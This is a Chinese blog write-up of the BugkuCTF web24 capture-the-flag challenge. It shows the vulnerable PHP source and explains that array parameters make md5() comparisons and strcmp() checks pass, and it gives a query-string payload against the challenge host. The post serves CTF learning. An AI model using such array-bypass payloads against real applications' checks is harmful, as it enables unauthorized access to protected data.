当前位置:网站首页>BugkuCTF-web24(解题思路及步骤)

BugkuCTF-web24(解题思路及步骤)

2022-07-02 06:34:00 hangshao0.0

看题

在这里插入图片描述
到处找,都没有额外信息
在这里插入图片描述

抓包

在这里插入图片描述
发现“链接”那个地方隐藏了一个a标签,点击跳转,得到代码
在这里插入图片描述

分析代码

<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    $v3 = $_GET['v3'];
    if($v1 != $v2 && md5($v1) == md5($v2)){
    
        if(!strcmp($v3, $flag)){
    
            echo $flag;
        }
    }
}
?>

又跟md5有关,前面其实已经写过一篇了
https://blog.csdn.net/weixin_45254208/article/details/115425962
但是不仅要满足md5,还要使变量 $ v3等于变量 $ flag,strcmp无法识别数组,直接返回0,看来,三个变量全部可以构造数组绕过

在这里插入图片描述

构造payload

http://114.67.246.176:17268/?v1[]=1&v2[]=2&v3[]=3

OK,出flag了
在这里插入图片描述

在这里插入图片描述

原网站

版权声明
本文为[hangshao0.0]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_45254208/article/details/115700461

边栏推荐

猜你喜欢

随机推荐